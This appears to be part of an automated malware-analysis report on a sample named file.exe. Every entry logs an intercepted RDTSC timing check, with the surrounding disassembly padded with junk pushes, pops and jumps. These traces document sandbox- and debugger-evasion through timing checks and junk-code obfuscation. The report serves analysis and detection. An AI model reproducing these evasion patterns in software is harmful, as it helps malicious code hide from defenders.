          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89930F second address: 899328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FBA8CEE23CDh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899328 second address: 899335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899335 second address: 899348 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CAh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898D8C second address: 898DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA8CCF3D56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e ja 00007FBA8CCF3D56h 0x00000014 pop ecx 0x00000015 push edx 0x00000016 jmp 00007FBA8CCF3D5Bh 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898DB2 second address: 898DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6ACD second address: 8A6AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA8CCF3D69h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A935C second address: 8A9389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CEE23D1h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007FBA8CEE23C6h 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jng 00007FBA8CEE23C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9389 second address: 8A93A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FBA8CCF3D5Ch 0x0000000d push ecx 0x0000000e je 00007FBA8CCF3D56h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9201 second address: 8A922A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CEE23D6h 0x00000009 pop edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f js 00007FBA8CEE23CEh 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9661 second address: 7D9665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9665 second address: 7D9687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FBA8CEE23D4h 0x0000000c pop ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9687 second address: 7D968D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D968D second address: 7D96AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBA8CEE23D3h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D96AB second address: 7D96B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABA78 second address: 8ABA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA8CEE23C6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABA82 second address: 8ABA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABA86 second address: 8ABAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBA8CEE23D6h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABAA4 second address: 8ABAD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D61h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jbe 00007FBA8CCF3D56h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FBA8CCF3D5Ch 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABAD3 second address: 8ABADF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA8CEE23CEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1DEA second address: 8C1DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C05A3 second address: 8C05AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA8CEE23C6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C05AD second address: 8C0601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBA8CCF3D65h 0x0000000d jmp 00007FBA8CCF3D62h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FBA8CCF3D68h 0x0000001b jl 00007FBA8CCF3D56h 0x00000021 push esi 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0875 second address: 8C0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0BA9 second address: 8C0BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0BAF second address: 8C0BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0BB3 second address: 8C0BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0D1F second address: 8C0D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007FBA8CEE23C6h 0x0000000f jmp 00007FBA8CEE23CBh 0x00000014 popad 0x00000015 push ebx 0x00000016 jg 00007FBA8CEE23C6h 0x0000001c pop ebx 0x0000001d pushad 0x0000001e jc 00007FBA8CEE23C6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0EA8 second address: 8C0EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0EAE second address: 8C0EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1040 second address: 8C1046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1046 second address: 8C1053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1053 second address: 8C1057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C1057 second address: 8C105B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C5A2F second address: 8C5A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C5A34 second address: 8C5A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C55AE second address: 8C55CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FBA8CCF3D56h 0x0000000f jmp 00007FBA8CCF3D61h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C5760 second address: 8C5774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007FBA8CEE23C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CAA16 second address: 8CAA23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBA8CCF3D56h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CAA23 second address: 8CAA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FBA8CEE23D0h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D86CF second address: 8D86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA8CCF3D56h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D86D9 second address: 8D86E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECE2E second address: 8ECE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECAD5 second address: 8ECADF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBA8CEE23CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECADF second address: 8ECAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECAE8 second address: 8ECB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBA8CEE23C6h 0x0000000a jmp 00007FBA8CEE23D5h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jo 00007FBA8CEE23C8h 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007FBA8CEE23C6h 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECB21 second address: 8ECB25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1E0B second address: 8F1E25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FBA8CEE23C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1E25 second address: 8F1E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1E2A second address: 8F1E2F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B123 second address: 91B142 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBA8CCF3D56h 0x00000008 jmp 00007FBA8CCF3D65h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91AB46 second address: 91AB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91AB4C second address: 91AB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CCF3D67h 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91AB68 second address: 91ABB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D8h 0x00000007 jc 00007FBA8CEE23DAh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FBA8CEE23D2h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBA8CEE23D8h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C883 second address: 91C88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C88E second address: 91C894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C894 second address: 91C898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DF78 second address: 91DF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DF80 second address: 91DF9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA8CCF3D62h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DF9B second address: 91DF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920E49 second address: 920E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 movsx edx, dx 0x0000000c push dword ptr [ebp+13AC24AEh] 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FBA8CCF3D58h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 32F93A17h 0x00000031 push esi 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC03F4 second address: 4BC044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBA8CEE23D7h 0x00000009 adc al, FFFFFFFEh 0x0000000c jmp 00007FBA8CEE23D9h 0x00000011 popfd 0x00000012 mov dh, ah 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBA8CEE23D6h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC044A second address: 4BC0450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0047 second address: 4BD004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD004B second address: 4BD0051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0051 second address: 4BD0057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0057 second address: 4BD005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD005B second address: 4BD0073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 4908D85Ch 0x00000014 mov si, bx 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0073 second address: 4BD00BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBA8CCF3D5Ch 0x00000009 jmp 00007FBA8CCF3D65h 0x0000000e popfd 0x0000000f push eax 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007FBA8CCF3D5Dh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBA8CCF3D5Ch 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD00BF second address: 4BD015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FBA8CEE23D6h 0x0000000f call 00007FBAFD1062D3h 0x00000014 push 74DF27D0h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov eax, dword ptr [esp+10h] 0x00000024 mov dword ptr [esp+10h], ebp 0x00000028 lea ebp, dword ptr [esp+10h] 0x0000002c sub esp, eax 0x0000002e push ebx 0x0000002f push esi 0x00000030 push edi 0x00000031 mov eax, dword ptr [74E80140h] 0x00000036 xor dword ptr [ebp-04h], eax 0x00000039 xor eax, ebp 0x0000003b push eax 0x0000003c mov dword ptr [ebp-18h], esp 0x0000003f push dword ptr [ebp-08h] 0x00000042 mov eax, dword ptr [ebp-04h] 0x00000045 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004c mov dword ptr [ebp-08h], eax 0x0000004f lea eax, dword ptr [ebp-10h] 0x00000052 mov dword ptr fs:[00000000h], eax 0x00000058 ret 0x00000059 pushad 0x0000005a call 00007FBA8CEE23CEh 0x0000005f mov si, A8F1h 0x00000063 pop eax 0x00000064 mov si, bx 0x00000067 popad 0x00000068 and dword ptr [ebp-04h], 00000000h 0x0000006c jmp 00007FBA8CEE23D9h 0x00000071 mov edx, dword ptr [ebp+0Ch] 0x00000074 jmp 00007FBA8CEE23CEh 0x00000079 mov esi, edx 0x0000007b jmp 00007FBA8CEE23D0h 0x00000080 mov al, byte ptr [edx] 0x00000082 jmp 00007FBA8CEE23D0h 0x00000087 inc edx 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD015A second address: 4BD0161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0161 second address: 4BD018C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBA8CEE23D4h 0x00000009 and cx, 5EE8h 0x0000000e jmp 00007FBA8CEE23CBh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD018C second address: 4BD01A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test al, al 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBA8CCF3D5Bh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD01A2 second address: 4BD01A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD01A8 second address: 4BD015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FBA8CCF3CD9h 0x00000011 mov al, byte ptr [edx] 0x00000013 jmp 00007FBA8CCF3D60h 0x00000018 inc edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0264 second address: 4BD027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA8CEE23D1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD027A second address: 4BD029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea ebx, dword ptr [edi+01h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBA8CCF3D66h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD029E second address: 4BD02AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD02AD second address: 4BD02B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD02B3 second address: 4BD02B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD02B7 second address: 4BD0341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edi+01h] 0x0000000b pushad 0x0000000c mov ecx, edx 0x0000000e pushfd 0x0000000f jmp 00007FBA8CCF3D69h 0x00000014 adc ecx, 0C36E806h 0x0000001a jmp 00007FBA8CCF3D61h 0x0000001f popfd 0x00000020 popad 0x00000021 inc edi 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FBA8CCF3D5Ch 0x00000029 add ecx, 0AA306A8h 0x0000002f jmp 00007FBA8CCF3D5Bh 0x00000034 popfd 0x00000035 call 00007FBA8CCF3D68h 0x0000003a mov eax, 2208A8A1h 0x0000003f pop esi 0x00000040 popad 0x00000041 test al, al 0x00000043 pushad 0x00000044 mov eax, edi 0x00000046 push eax 0x00000047 push edx 0x00000048 mov esi, edi 0x0000004a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0341 second address: 4BD037D instructions: 0x00000000 rdtsc 0x00000002 call 00007FBA8CEE23D1h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007FBAFD0FAAEDh 0x00000011 jmp 00007FBA8CEE23D7h 0x00000016 mov ecx, edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
